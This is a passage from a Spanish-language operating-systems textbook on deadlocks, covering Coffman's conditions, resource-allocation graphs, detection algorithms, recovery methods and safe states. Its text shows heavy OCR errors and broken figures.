En la mayoría de los casos, el evento por el que cada proceso espera es la liberación de algún re¬ 
curso que actualmente es poseído por otro miembro del conjunto. En otras palabras, cada miembro del 
conjunto de procesos en interbloqueo está esperando un recurso que posee un proceso en interbloqueo. 
Ninguno de los procesos se puede ejecutar, ninguno de ellos puede liberar recursos y ninguno puede 
ser despertado. El número de procesos y el número de cualquier tipo de recursos poseídos y solicitados 
es irrelevante. Este resultado se aplica a cualquier tipo de recurso, tanto de hardware como de softwa¬ 
re. A este tipo de interbloqueo se le conoce como interbloqueo de recursos. Es probablemente el tipo 
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más común, pero no el único. Primero estudiaremos ios interbioqueos de recursos con detaiie, y des¬ 
pués regresaremos brevemente a ios demás tipos de interbioqueos ai finai dei capítuio. 

6.2.1 C ondiciones para los interbloqueos de recursos 

Coffman y coiaboradores (1971) mostraron que deben apiicarse cuatro condiciones para un inter- 
bioqueo (de recursos): 

1. Condición de exciusión mutua. Cada recurso se asigna en un momento dado a sóio un pro¬ 
ceso, o está disponibie. 

2. Condición de contención y espera. Los procesos que actuaimente contienen recursos que se 
Íes otorgaron antes pueden soiicitar nuevos recursos. 

3. Condición no apropiad va. L os recursos otorgados previamente no se pueden quitar a un pro¬ 
ceso por ia fuerza. Deben ser iiberados de manera expiícita por ei proceso que ios contiene. 

4. Condición de espera circuían Debe haber una cadena circuiar de dos o más procesos, cada 
uno de ios cuaies espera un recurso contenido por ei siguiente miembro de ia cadena. 

Las cuatro condiciones deben estar presentes para que ocurra un interbioqueo. Si una de eiias está 
ausente, no es posibie ei interbioqueo de recursos. 

Vaie ia pena observar que cada condición se reiaciona con una poiítica que puede o no tener un sis¬ 
tema. ¿Puede asignarse un recurso dado a más de un proceso a ia vez? ¿Puede un proceso contener un 
recurso y pedir otro? ¿Pueden reempiazarse ios procesos? ¿Pueden existir esperas circuiares? M ás ade- 
iante veremos cómo se puede atacar a ios interbioqueos ai tratar de negar aigunas de estas condiciones. 

6.2.2 M odelado de interbloqueos 

Hoit (1972) mostró cómo se pueden modeiar estas cuatro condiciones mediante ei uso de gráficos di¬ 
rigidos. Los gráficos tienen dos tipos de nodos: procesos, que se muestran como circuios, y recursos, 
que se muestran como cuadros. U n arco dirigido de un nodo de recurso (cuadro) a un nodo de proceso 
(círcuio) significa que ei recurso fue soiicitado previamente por, y asignado a, y actuai mente es conte¬ 
nido por ese proceso. En ia figura 6-3(a), ei recurso R está asignado actuai mente ai proceso A. 

Un arco dirigido de un proceso a un recurso significa queei proceso está actuai mente bioquea- 
do, en espera de ese recurso. En ia figura 6-3(b), ei proceso B espera ai recurso S. En ia figura 
6-3(c) podemos ver un interbioqueo: ei proceso C está esperando ai recurso T, que actuai mente es 
contenido por ei proceso D. Ei proceso D no va a iiberar ai recurso T debido a que está esperando 
ei recurso U, contenido por C. Ambos procesos esperarán para siempre. Un cicio en ei gráfico in¬ 
dica que hay un interbioqueo que invoiucra a ios procesos y recursos en ei cicio (suponiendo que 
hay un recurso de cada tipo). En este ejempio, ei cicio es C-T-D-U-C. 

Ahora veamos un ejempio de cómo se pueden utiiizar ios gráficos de recursos. Imagine que te¬ 
nemos tres procesos A, B y C, y tres recursos R, S y T. Las peticiones y iiberaciones de ios tres pro- 
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(a) (b) (c) 

Figura 6-3. Gráficos de asignación de recursos, (a) Contención de un recurso, (b) Pe¬ 
tición de un recurso, (c) Interbioqueo. 


cesos se proporcionan en las figuras 6-4(a) a (c). El sistema operativo es libre de ejecutar cualquier 
proceso desbloqueado en cualquier momento, por lo que podría optar por ejecutar A hasta que ter¬ 
minara todo su trabajo, después B hasta que completara y por último C. 

Este orden no produce interbloqueos (debido a que no hay competencia por los recursos), pe¬ 
ro tampoco tiene paralelismo. Además de solicitar y liberar recursos, los procesos realizan cálcu¬ 
los y operaciones deE/S. Cuando los procesos se ejecutan en forma secuencial, no hay posibilidad 
de que mientras un proceso espera la E/S, otro pueda utilizar la CPU. Por ende, ejecutar los pro¬ 
cesos estrictamente en forma secuencial puede no ser óptimo. Por otra parte, si ninguno de los 
procesos realiza operaciones de E/S, es mejor el algoritmo del trabajo más corto primero que el al¬ 
goritmo por turno rotatorio (round-robin), por lo que en ciertas circunstancias tal vez lo mejor sea 
ejecutar todos los procesos en forma secuencial. 

A hora vamos a suponer que los procesos realizan tanto operaciones de E/S como cálculos, por 
lo que el algoritmo por turno rotatorio es un algoritmo de programación razonable. Las peticiones 
de recursos podrían ocurrir en el orden de la figura 6-4(d). Si estas seis solicitudes se llevan a cabo 
en ese orden, los seis gráficos de recursos resultantes se muestran en las figuras 6-4(e) a (j). Des¬ 
pués de haber realizado la petición 4, A se bloquea en espera de S, como se muestra en la figura 
6-4(h). En los siguientes dos pasos B y C también se bloquean, lo que en última instancia conduce 
a un ciclo y al interbloqueo de la figura 6-4(j). 

Sin embargo, y como ya hemos mencionado, el sistema operativo no tiene que ejecutar los pro¬ 
cesos en un orden especial. En particular si al otorgar una petición específica se puede producir un 
interbloqueo, el sistema operativo simplemente puede suspender el proceso sin otorgar la solicitud 
(es decir, no sólo programar el proceso) hasta que sea seguro. En la figura 6-4, si el sistema opera¬ 
tivo supiera acerca del interbloqueo inminente, podría suspender a B en vez de otorgarle el recurso 
S. Al ejecutar sólo A y C, obtendríamos las peticiones y liberaciones de la figura 6-4(k) en vez de 
la figura 6.4(d). Esta secuencia produce los gráficos de recursos de las figuras 6-4(1) a (q), que no 
producen un interbloqueo. 

Después del paso (q), se puede otorgar el recurso S al proceso B, debido a que A ha terminado 
y C tiene todo lo que necesita. A un si B se hubiera bloqueado al solicitar a T, no puede ocurrir un 
interbloqueo. B sólo esperará hasta que C termine. 
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Solicitud R 
Solicitud S 
Liberación R 
Liberación S 


Solicitud S 
Solicitud T 
Liberación S 
Liberación T 


Solicitud T 
Solicitud R 
Liberación T 
Liberación R 


(a) 


(b) 


(O 


1. A solicita a R 

2. B solicita a S 

3. C solicita a T 

4. A solicita a S 

5. B solicita a T 

6. C solicita a R 
interbloqueo 


@ © © 
[|] El [3 





© 

m 


(d) 


(e) 


(f) 


(g) 



1. A solicita a R 

2. C solicita a T 

3. A solicita a S 

4. C solicita a R 

5. A libera a R 

6. A libera a S 

no hay interbloqueo 





(k) 


(I) 


(m) 


(n) 



Figura 6-4. U n ejemplo sobre cómo puede ocurrir el interbloqueo y cómo se puede 
evitar. 
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M ás adelante en este capítulo estudiaremos un algoritmo detallado para realizar decisiones de 
asignación que no produzcan interbloqueos. Por ahora, el punto a comprender es que los gráficos 
de recursos son una herramienta que nos permite ver si una secuencia de petición/liberación dada 
conduce al interbloqueo. Sólo llevamos a cabo las peticiones y liberaciones paso a paso, y después 
de cada paso comprobamos el gráfico para ver si contiene ciclos. De ser así, tenemos un interblo¬ 
queo: en caso contrario, no lo hay. A unque nuestro análisis de los gráficos de recursos ha sido pa¬ 
ra el caso de un solo recurso de cada tipo, los gráficos de recursos también se pueden generalizar 
para manejar varios recursos del mismo tipo (Holt, 1972). 

En general, se utilizan cuatro estrategias para lidiar con los interbloqueos. 

1. Sólo ignorar el problema. Tal vez si usted lo ignora, él lo ignorará a usted. 

2. Detección y recuperación. Dejar que ocurran los interbloqueos, detectarlos y tomar acción. 

3. Evitarlos en forma dinámica mediante la asignación cuidadosa de los recursos. 

4. Prevención, al evitar estructural mente una de las cuatro condiciones requeridas. 

Analizaremos cada uno de estos métodos en las siguientes cuatro secciones. 


6.3 EL ALGORITMO DE LAAVESTRUZ 

El método más simple es el algoritmo de la avestruz: meta su cabeza en la arena y pretenda que no 
hay ningún problema.i" Las personas reaccionan a esta estrategia de diversas formas. Los matemá¬ 
ticos la encuentran totalmente inaceptable y dicen que los interbloqueos se deben prevenir a toda 
costa: los ingenieros preguntan con qué frecuencia se espera el problema, con qué frecuencia falla 
el sistema por otras razones y qué tan gravees un interbloqueo. Si ocurren interbloqueos en prome¬ 
dio de una vez cada cinco años, pero los fallos del sistema debido al hardware, errores del compi¬ 
lador y errores en el sistema operativo ocurren una vez por semana, la mayoría de los ingenieros no 
estarán dispuestos a reducir considerablemente el rendimiento por la conveniencia de eliminar los 
interbloqueos. 

Para que este contraste sea más específico, considere un sistema operativo que bloquea al pro¬ 
ceso llamador cuando no se puede llevar a cabo una llamada al sistema open en un dispositivo físi¬ 
co, como una unidad de CD-ROM o una impresora, debido a que el dispositivo está muy ocupado. 
Por lo general es responsabilidad del driver (controlador) de dispositivos decidir qué acción tomar 
bajo tales circunstancias. Bloquear o devolver una clave de error son dos posibilidades obvias. Si 
un proceso abre exitosamente la unidad de CD-ROM y otro la impresora, y después cada proceso 
trata de abrir el otro recurso y se bloquea en el intento, tenemos un interbloqueo. Pocos sistemas ac¬ 
tuales detectarán esto. 


t En realidad, esta imagen del dominio público no es realista. Los avestruces pueden correr a 60 km/hora y tienen una pata¬ 
da lo bastante potente como para matar a cualquier león con planes de cenar pollo . 
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6.4 DETECCIÓNY RECUPERACIÓN 
DE UN INTERBLOQUEO 

Una segunda técnica es la detección y recuperación. Cuando se utiliza esta técnica, el sistema no 
trata de evitar los interbloqueos. En vez de ello, intenta detectarlos cuando ocurran y luego realiza 
cierta acción para recuperarse después del hecho. En esta sección analizaremos algunas de las for¬ 
mas en que se pueden detectar los interbloqueos, y ciertas maneras en que se puede llevar a cabo 
una recuperación de los mismos. 

6.4.1 Detección de interbloqueos con un recurso de cada tipo 

Vamos a empezar con el caso más simple: sólo existe un recurso de cada tipo. Dicho sistema podría 
tener un escáner, un grabador de CD, un trazador (plotter) y una unidad de cinta, pero no más que 
un recurso de cada clase. En otras palabras, estamos excluyendo los sistemas con dos impresoras 
por el momento. M ás adelante lidiaremos con ellos, usando un método distinto. 

Para un sistema así, podemos construir un gráfico de recursos del tipo ilustrado en la figura 6-3. 
Si este gráfico contiene uno o más ciclos, existe un interbloqueo. Cualquier proceso que forme parte 
de un ciclo está en interbloqueo. Si no existen ciclos, el sistema no está en interbloqueo. 

Como ejemplo de un sistema más complejo que los que hemos analizado hasta ahora, conside¬ 
re un sistema con siete procesos, A a G, y seis recursos, R a W. El estado de cuáles recursos están 
contenidos por algún proceso y cuáles están siendo solicitados es el siguiente: 

1. El proceso A contiene a R y quiere a S. 

2. El proceso B no contiene ningún recurso pero quiere a T. 

3. El proceso C no contiene ningún recurso pero quiere a S. 

4. El proceso D contiene a U y quiere a S y a T. 

5. El proceso E contiene a T y quiere a V. 

6. El proceso F contiene a W y quiere a S. 

7. El proceso G contiene a V y quiere a U . 

La pregunta es: "¿Está este sistema en interbloqueo y, de ser así, cuáles procesos están involucrados?". 

Para responder a esta pregunta podemos construir el gráfico de recursos de la figura 6-5(a). Es¬ 
te gráfico contiene un ciclo, que se puede ver mediante una inspección visual. El ciclo se muestra en 
la figura 6-5(b). De este ciclo podemos ver que los procesos D, E y G están en interbloqueo. Los pro¬ 
cesos A, C y F no están en interbloqueo debido a queS puede asignarse a cualquiera de ellos, que a 
su vez termina y lo devuelve. Después los otros dos pueden tomarlo en turno y completarse también 
(observe que para hacer este ejemplo más interesante, hemos permitido que algunos procesos, como 
D, pidan dos recursos a la vez). 


SECCION 6.4 DETECCION Y RECUPERACION DE UN INTERBLOOUEO 


443 


0 —-( 


gH-0—(^0—0 


w 


© 0 


0 


©- 

(a) 


©■ 


•© 


0 


(b) 


Figura 6-5. (a) U n gráfico de recursos, (b) U n ciclo extraído de (a). 


Aunque es relativamente fácil distinguir los procesos en interbloqueo a simple vista a partir 
de un sencillo gráfico, para usar este método en sistemas reales necesitamos un algoritmo formal 
para la detección de interbloqueos. Hay muchos algoritmos conocidos para detectar ciclos en grá¬ 
ficos dirigidos. A continuación veremos un algoritmo simple que inspecciona un gráfico y termi¬ 
na al haber encontrado un ciclo, o cuando ha demostrado que no existe ninguno. Utiliza cierta 
estructura dinámica de datos: L, una lista de nodos, así como la lista de arcos. Durante el algorit¬ 
mo, los arcos se marcarán para indicar que ya han sido inspeccionados, para evitar repetir inspec¬ 
ciones. 

El algoritmo opera al llevar a cabo los siguientes pasos, según lo especificado: 

1. Para cada nodo N en el gráfico, realizar los siguientes cinco pasos con N como el nodo ini¬ 
cial. 

2. Inicializar L con la lista vacía y designar todos los arcos como desmarcados. 

3. Agregar el nodo actual al final de L y comprobar si el nodo ahora aparece dos veces en L. 
Si lo hace, el gráfico contiene un ciclo (listado en L) y el algoritmo termina. 

4. Del nodo dado, ver si hay arcos salientes desmarcados. De ser así, ir al paso 5; en caso con¬ 
trario, ir al paso 6. 

5. Elegir un arco saliente desmarcado al azar y marcarlo. Después seguirlo hasta el nuevo no¬ 
do actual e ir al paso 3. 

6. Si este nodo es el inicial, el gráfico no contiene ciclos y el algoritmo termina. En caso con¬ 
trario, ahora hemos llegado a un punto muerto. Eliminarlo y regresar al nodo anterior; es de¬ 
cir, el que estaba justo antes de éste, hacerlo el nodo actual e ir al paso 3. 
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Lo que hace este algoritmo es tomar cada nodo en turno, como la raíz de lo que espera sea un ár¬ 
bol, y realiza una búsqueda de un nivel de profundidad en él. Si alguna vez regresa a un nodo que 
ya se haya encontrado, entonces ha encontrado un ciclo. Si agota todos los arcos desde cualquier 
nodo dado, regresa al nodo anterior. Si regresa hasta la raíz y no puede avanzar más, el subgráfico 
que se puede alcanzar desde el nodo actual no contiene ciclos. Si esta propiedad se aplica para todos 
los nodos, el gráfico completo está libre de ciclos, por lo que el sistema no está en interbloqueo. 

Para ver cómo funciona el algoritmo en la práctica, vamos a utilizarlo con el gráfico de la fi¬ 
gura 6-5(a). El orden de procesamiento de los nodos es arbitrario, por lo que sólo los inspecciona¬ 
remos de izquierda a derecha, de arriba hacia abajo, ejecutando primero el algoritmo empezando en 
R, después sucesivamente en A, B, C, S, D, T, E, F, y así en lo sucesivo. Si llegamos a un ciclo, el 
algoritmo se detiene. 

Empezamos en R e inicializamos L con la lista vacía. Después agregamos Rala lista y avan¬ 
zamos a la única posibilidad. A, y lo agregamos a L, con lo cual tenemos que L = [R, A]. De A pa¬ 
samos a S, para obtener L = [R, A, Sj. S no tiene arcos salientes, por lo que es un punto muerto, lo 
cual nos obliga a regresara A. Como A no tiene arcos salientes desmarcados, regresamos a R, com¬ 
pletando nuestra inspección de R. 

Ahora reiniciamos el algoritmo empezando en A, y restablecemos L a la lista vacía. Esta bús¬ 
queda también se detiene rápidamente, por lo que empezamos de nuevo en B. De B continuamos si¬ 
guiendo los arcos salientes hasta llegar a D, donde L = [B, T, E, V, G, U, Dj. Ahora debemos 
realizar una elección (al azar). Si elegimos S llegamos a un punto muerto, y regresamos a D. La se¬ 
gunda vez que elegimos! y actualizamos L para que sea [B, T, E, V, G, U, D, T], en donde descu¬ 
brimos el ciclo y detenemos el algoritmo. 

Este algoritmo está muy lejos de ser óptimo. Para ver uno mejor, consulte (Even, 1979). Sin 
embargo, sirve para demostrar que existe un algoritmo para la detección del interbloqueo. 

6.4.2 Detección del interbloqueo con varios recursos de cada tipo 

Cuando existen varias copias de algunos de los recursos, se necesita un método distinto para detec¬ 
tar interbloqueos. A hora presentaremos un algoritmo basado en matrices para detectar interbloqueos 
entre n procesos, de P^ a P^. Hagamos que el número de clases de recursos sea m, con E;^ recursos 
de la clase 1, Ej recursos de la clase 2 y en general, E¡ recursos de la clase i (1 < i < m). E es el 
vector de recursos existentes. Este vector proporciona el número total de instancias de cada recur¬ 
so en existencia. Por ejemplo, si la clase 1 son las unidades de cinta, entonces = 2 significa que 
el sistema tiene dos unidades de cinta. 

E n cualquier instante, algunos de los recursos están asignados y no están disponibles. H agamos 
queA sea el vector de recursos disponibles, dondeA¡ proporciona el número de instancias del re¬ 
curso i que están disponibles en un momento dado (es decir, sin asignar). Si ambas de nuestras uni¬ 
dades de cinta están asignadas, A;^ será 0. 

Ahora necesitamos dos arreglos: C, la matriz de asignaciones actuales y R, la matriz de pe¬ 
ticiones. La i-ésima fila de C nos indica cuántas instancias de cada clase de recurso contiene P¡ en 
un momento dado. Así Cy es el número de instancias del recurso) que están contenidas por el pro¬ 
ceso i. De manera similar, Ry es el número de instancias del recurso) que desea P¡. Estas cuatro es¬ 
tructuras de datos se muestran en la figura 6-6. 
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ei proceso 2 


Figura 6-6. Las cuatro estructuras de datos que necesita el algoritmo de detección de 
interbloqueos. 


Hay una importante invariante que se aplica para estas cuatro estructuras de datos. En especial, 
cada recurso está asignado o está disponible. Esta observación significa que 

2 Cij + Aj = Ej 
!=1 

En otras palabras, si agregamos todas las instancias del recurso j que se han asignado, y para ello 
agregamos todas las instancias disponibles, el resultado es el número de instancias existentes de esa 
clase de recursos. 

EI algoritmo de detección de interbloqueos se basa en la comparación de vectores. Vamos a de¬ 
finir la relación A < B en dos vectores A y B para indicar que cada elemento de A es menor o igual 
que el elemento correspondiente de B. En sentido matemático A < B se aplica sí, y sólo si A¡ < B¡ 
para 1 < i < m. 

AI principio, se dice que cada proceso está desmarcado. A medida que el algoritmo progrese se 
marcarán los procesos, indicando que pueden completarse y, por ende, no están en interbloqueo. 
Cuando el algoritmo termine, se sabe que cualquier proceso desmarcado está en interbloqueo. Este 
algoritmo supone un escenario del peor caso: todos los procesos mantienen todos los recursos ad¬ 
quiridos hasta que terminan. 

El algoritmo de detección de interbloqueos se muestra a continuación. 

1. Buscar un proceso desmarcado, P¡, para el que la i-ésima fila de R sea menor o igual que A. 

2. Si se encuentra dicho proceso, agregar la i-ésima fila de C a A, marcar el proceso y regresar 
al paso 1. 

3. Si no existe dicho proceso, el algoritmo termina. 

Cuando el algoritmo termina, todos los procesos desmarcados (si los hay) están en interbloqueo. 
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Lo que hace el algoritmo en el paso 1 es buscar un proceso que se pueda ejecutar hasta com¬ 
pletarse. Dicho proceso se caracteriza por tener demandas de recursos que se pueden satisfacer con 
base en los recursos disponibles actuales. Entonces, el proceso seleccionado se ejecuta hasta que 
termina, momento en el que devuelve los recursos que contiene a la reserva de recursos disponibles. 
Después se marca como completado. Si todos los procesos pueden en última instancia ejecutarse 
hasta completarse, ninguno de ellos está en interbloqueo. Si algunos de ellos nunca pueden termi¬ 
nar, están en interbloqueo. Aunque el algoritmo no es determinístico (debido a que puede ejecutar 
los procesos en cualquier orden posible), el resultado siempre es el mismo. 

Como ejemplo acerca de cómo funciona el algoritmo de detección de interbloqueos, considere 
la figura 6-7. Aquí tenemos tres procesos y cuatro clases de recursos, que hemos etiquetado en for¬ 
ma arbitraria como unidades de cinta, trazadores, escáner y unidad de CD-ROM . El proceso 1 tie¬ 
ne un escáner. El proceso 2 tiene dos unidades de cinta y una unidad de CD-ROM . El proceso 3 
tiene un trazador y dos escáneres. Cada proceso necesita recursos adicionales, como se muestra con 
base en la matriz R. 



E={ 4 2 3 1) A=(2 1 o 0) 


Matriz de asignaciones actuaies Matriz de peticiones 
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0 
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2 
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Figura 6-7. U n ejemplo para el algoritmo de detección de interbloqueos. 


Para ejecutar el algoritmo de detección de interbloqueos, buscamos un proceso cuya petición 
de recursos se pueda satisfacer. La primera no se puede satisfacer debido a que no hay unidad de 
CD-ROM disponible. La segunda tampoco se puede satisfacer, ya que no hay escáner libre. Por for¬ 
tuna la tercera se puede satisfacer, por lo que el proceso 3 se ejecuta y en un momento dado devuel¬ 
ve todos sus recursos, para obtener 

A =(2 2 2 0) 

En este punto se puede ejecutar el proceso 2 y devolver sus recursos, con lo cual obtenemos 

A =(4 2 2 1) 

Ahora se puede ejecutar el proceso restante. No hay interbloqueo en el sistema. 
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Consideremos ahora una variación menor de ia situación de ia figura 6-7. Suponga que ei pro¬ 
ceso 2 necesita una unidad de CD-ROM , así como ias dos unidades de cinta y ei trazador. Ninguna 
de ias peticiones se puede satisfacer, por io que todo ei sistema está en interbioqueo. 

Ahora que sabemos cómo detectar interbioqueos (por io menos cuando se conocen de ante¬ 
mano ias peticiones de recursos estáticas), surge ia pregunta sobre cuándo buscarios. U na posibi- 
iidad es comprobar cada vez que se reaiiza una petición de un recurso. Esto sin duda ios detectará 
io más pronto posibie, pero es potenci ai mente costoso en términos de tiempo de ia CPU. Una es¬ 
trategia aiternativa es comprobar cada k minutos, o tai vez sóio cuando haya disminuido ei uso de 
ia CPU por debajo de aigún vaior de umbrai. La razón de esta consideración es que si hay sufi¬ 
cientes procesos en interbioqueo, habrá pocos procesos ejecutabies y ia CPU estará inactiva con 
frecuencia. 


6.4.3 Recuperación de un interbloqueo 

Suponga que nuestro aigoritmo de detección de interbioqueos ha tenido éxito y detectó un interbio¬ 
queo. ¿Qué debemos hacer ahora? Se necesita aiguna forma de recuperarse y hacer funcionar ei sis¬ 
tema otra vez. En esta sección anaiizaremos varias formas de recuperarse de un interbioqueo. Sin 
embargo, ninguna de eiias es en especiai atractiva. 

Recuperación por medio de apropiación 

En aigunos casos puede ser posibie quitar temporaimente un recurso a su propietario actuai y otor¬ 
gado a otro proceso. En muchos casos se puede requerir intervención manuai, en especiai en ios sis¬ 
temas operativos de procesamiento por iotes que se ejecutan en mainframes. 

Por ejempio, para quitar una impresora iáser a su propietario, ei operador puede recoiectar to¬ 
das ias hojas ya impresas y coiocarias en una piia. Después se puede suspender ei proceso (se mar¬ 
ca como no ejecutabie). En este punto, ia impresora se puede asignar a otro proceso. Cuando ese 
proceso termina, ia piia de hojas impresas se puede coiocar de vueita en ia bandeja de saiida de ia 
impresora y se puede reiniciar ei proceso originai. 

La habiiidad de quitar un recurso a un proceso, hacer que otro proceso io utiiicey después re¬ 
gresado sin queei proceso io note, depende en gran parte de ia naturaieza dei recurso. Con frecuen¬ 
cia esdifícii o imposibie recuperarse de esta manera. Eiegir ei proceso a suspender depende en gran 
parte de cuáies procesos tienen recursos que se pueden quitar con faciiidad. 

Recuperación a través del retroceso 

Si ios diseñadores de sistemas y operadores de máquinas saben que es probabie que haya interbio¬ 
queos, pueden hacer que ios procesos reaiicen puntos de comprobación en forma periódica. Rea- 
iizar puntos de comprobación en un proceso significa que su estado se escribe en un archivo para 
poder reiniciario más tarde. Ei punto de comprobación no sóio contiene ia imagen de ia memoria, 
sino también ei estado dei recurso: en otras paiabras, qué recursos están asignados ai proceso en un 
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momento dado. Para que sean más efectivos, los nuevos puntos de comprobación no deben sobres¬ 
cribir a los anteriores, sino que deben escribirse en nuevos archivos, para que se acumule una se¬ 
cuencia completa a medida que el proceso se ejecute. 

Cuando se detecta un interbloqueo, es fácil ver cuáles recursos se necesitan. Para realizar la re¬ 
cuperación, un proceso que posee un recurso necesario se revierte a un punto en el tiempo antes de 
que haya adquirido ese recurso, para lo cual se inicia uno de sus puntos de comprobación anterio¬ 
res. Se pierde todo el trabajo realizado desde el punto de comprobación (por ejemplo, la salida im¬ 
presa desde el punto de comprobación se debe descartar, ya que se volverá a imprimir). En efecto, 
el proceso se restablece a un momento anterior en el que no tenía el recurso, que ahora se asigna a 
uno de los procesos en interbloqueo. Si el proceso reiniciado trata de adquirir el recurso de nuevo, 
tendrá que esperar hasta que vuelva a estar disponible. 

Recuperación a través de la eliminación de procesos 

La forma más cruda y simple de romper un interbloqueo es eliminar uno o más procesos. Una po¬ 
sibilidad es eliminar a uno de los procesos en el ciclo. Con un poco de suerte, los demás procesos 
podrán continuar. Si esto no ayuda, se puede repetir hasta que se rompa el ciclo. 

De manera alternativa, se puede elegir como víctima a un proceso que no esté en el ciclo, pa¬ 
ra poder liberar sus recursos. En este método, el proceso a eliminar se elige con cuidado, debido a 
que está conteniendo recursos que necesita cierto proceso en el ciclo. Por ejemplo, un proceso po¬ 
dría contener una impresora y querer un trazador, en donde otro proceso podría contener un traza¬ 
dor y querer una impresora. Estos dos procesos están en interbloqueo. Un tercer proceso podría 
contener otra impresora idéntica y otro trazador idéntico, y estar felizmente en ejecución. Al elimi¬ 
nar el tercer proceso se liberarán estos recursos y se romperá el interbloqueo que involucra a los pri¬ 
meros dos. 

Donde sea posible, es mejor eliminar un proceso que se pueda volver a ejecutar desde el prin¬ 
cipio sin efectos dañinos. Por ejemplo, una compilación siempre podrá volver a ejecutarse, ya que 
todo lo que hace es leer un archivo de código fuente y producir un archivo de código objeto. Si se 
elimina a mitad del proceso, la primera ejecución no tiene influencia sobre la segunda. 

Por otra parte, un proceso que actualiza una base de datos no siempre se puede ejecutar una se¬ 
gunda vez en forma segura. Si el proceso agrega 1 a algún campo de una tabla en la base de datos, 
al ejecutarlo una vez, después eliminarlo y volverlo a ejecutar de nuevo, se agregará 2 al campo, lo 
cual es incorrecto. 

6.5 CÓMO EVITAR INTERBLOQUEOS 

En nuestro análisis de detección de interbloqueos hicimos la suposición de que cuando un proceso 
pide recursos, los pide todos a la vez (la matriz R de la figura 6-6). Sin embargo, en la mayoría de 
los sistemas los recursos se solicitan uno a la vez. El sistema debe ser capaz de decidir si es segu¬ 
ro otorgar un recurso o si no lo es, y realizar la asignación sólo cuando sea seguro. Por ende, surge 
la pregunta: ¿Hay algún algoritmo que siempre pueda evitar un interbloqueo al realizar la elección 
correcta todo el tiempo? La respuesta es un sí calificado: podemos evitar los interbloqueos, pero só- 
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lo si hay cierta información disponibie de antemano. En esta sección examinaremos ias formas de 
evitar el interdioqueo mediante una asignación cuidadosa de ios recursos. 

6.5.1 Trayectorias de los recursos 

Los principaies aigoritmos para evitar interbioqueos se basan en ei concepto de ios estados seguros. 
Antes de describir ios aigoritmos, haremos una iigera digresión para anaiizar ei concepto de ia se¬ 
guridad, en una forma gráfica y fácii de comprender. Aunque ei método gráfico no se traduce direc¬ 
tamente en un aigoritmo utiiizabie, ofrece una buena sensación intuitiva de ia naturaieza dei 
probiema. 

En ia figura 6-8 podemos ver un modeio para iidiar con dos procesos y dos recursos, por ejem- 
pio, una impresora y un trazador. Ei eje horizontai representa ei número de instrucciones ejecutadas 
por ei proceso A. Ei eje verticai representa ei número de instrucciones ejecutadas por ei proceso B. 
En 1^, A soiicita una impresora: en Ij necesita un trazador. La impresora y ei trazador se iiberan en 
I 3 y en I 4 , respectivamente. Ei proceso B necesita ei trazador de I 5 a I 7 , y ia impresora de I 5 a Ig. 


Impresora 

L 

T 

Trazador 



Impresora - 


Trazador 


Figura 6-8. Trayectorias de recursos de dos procesos. 

Cada punto en ei diagrama representa un estado conjunto de ios dos procesos. A i principio ei es¬ 
tado está en p, en donde ninguno de ios procesos ha ejecutado instrucciones. Si ei programador opta 
por ejecutar primero a A, iiegamos ai punto 1, en ei que A ha ejecutado cierto número de instruccio¬ 
nes, pero B no ha ejecutado ninguna. En ei punto q, ia trayectoria se vueive verticai, indicando queei 
programador ha optado por ejecutar a B. Con un soio procesador, todas ias rutas deben ser horizonta- 
ies o verticaies, nunca diagonaies. Además, ei movimiento siempre es hacia ei norte o ai este, nunca 
ai sur ni ai oeste (debido a que ios procesos no pueden ejecutarse ai revés en ei tiempo, desde iuego). 

Cuando A cruza con ia iínea I 3 en ia ruta de r a s, soiicita ia impresora y se ie otorga. Cuando 
B iiega ai punto t, soiicita ei trazador. 
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Las regiones sombreadas son en especial interesantes. La región con las líneas que se inclinan 
de suroeste a noreste representa cuando ambos procesos tienen la impresora. La regla de exclusión 
mutua hace imposible entrar a esta región. De manera similar, la región sombreada de la otra for¬ 
ma representa cuando ambos procesos tienen el trazador, y es igual de imposible. 

Si el sistema entra alguna vez al cuadro delimitado por 1;^ e Ij en los lados, y por I 5 e Ig en la 
parte superior e inferior, entrará en interbloqueo en un momento dado, cuando llegue a la intersec¬ 
ción de Ij e Ig. En este punto, A está solicitando el trazador y B la impresora, y ambos recursos ya 
están asignados. Todo el cuadro es inseguro y no se debe entrar en él. En el punto t, lo único segu¬ 
ro por hacer es ejecutar el proceso A hasta que llegue a I 4 . M ás allá de eso, cualquier trayectoria 
hasta u bastará. 

Lo importante a considerar aquí es que en el punto t, B está solicitando un recurso. El sistema 
debe decidir si lo otorga o no. Si se otorga el recurso, el sistema entrará en una región insegura y 
en el interbloqueo, en un momento dado. Para evitar el interbloqueo, B se debe suspender hasta que 
A haya solicitado y liberado el trazador. 

6.5.2 Estados seguróse inseguros 

Los algoritmos para evitar interbloqueos que estudiaremos utilizan la información de la figura 6 - 6 . 
En cualquier instante hay un estado actual que consiste en E, A, C y R. Se dice que un estado es se¬ 
guro si hay cierto orden de programación en el que se puede ejecutar cada proceso hasta comple¬ 
tarse, incluso aunque todos ellos solicitaran de manera repentina su número máximo de recursos de 
inmediato. Es más fácil ilustrar este concepto mediante un ejemplo, en el que se utiliza un recurso. 
En la figura 6-9(a) tenemos un estado en el que A tiene tres instancias del recurso, pero puede ne¬ 
cesitar hasta nueve en un momento dado. En la actualidad B tiene dos y puede necesitar cuatro en 
total, más adelante. De manera similar, C también tiene dos pero puede necesitar cinco más. Exis¬ 
te un total de 10 instancias del recurso, por lo que con siete recursos ya asignados, todavía hay tres 
libres. 
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(a) (b) (c) (d) (e) 

Figura 6-9. Demostración de que el estado en (a) es seguro. 


El estado de la figura 6-9(a) es seguro, debido a que existe una secuencia de asignaciones que 
permite completar todos los procesos. A saber, el programador podría simplemente ejecutar B en 
forma exclusiva, hasta que pidiera y obtuviera dos instancias más del recurso, lo cual nos lleva al 
estado de la figura 6-9(b). Al completarse B, obtenemos el estado de la figura 6-9(c). Después el 
programador puede ejecutar C, con lo que obtendríamos en un momento dado la figura 6-9(d). 
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Cuando C se complete, obtendremos la figura 6.9(e). Ahora A puede obtener las seis instancias del 
recurso que necesita y también completarse. Por ende, el estado de la figura 6-9(a) es seguro ya 
que el sistema, mediante una programación cuidadosa, puede evitar el interbloqueo. 

Ahora suponga que tenemos el estado inicial que se muestra en la figura 6-10(a), pero esta vez 
A solicita y obtiene otro recurso, con lo que obtenemos la figura 6-10(b). ¿Podemos encontrar una 
secuencia que se garantice que funcione? Vamos a intentarlo. El programador podría ejecutar a B 
hasta que pidiera todos sus recursos, como se muestra en la figura 6-10(c). 
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Figura 6-10. Demostración de que el estado en (b) no es seguro. 


Tiene Máx. 


A 

4 

9 

B 

- 

- 

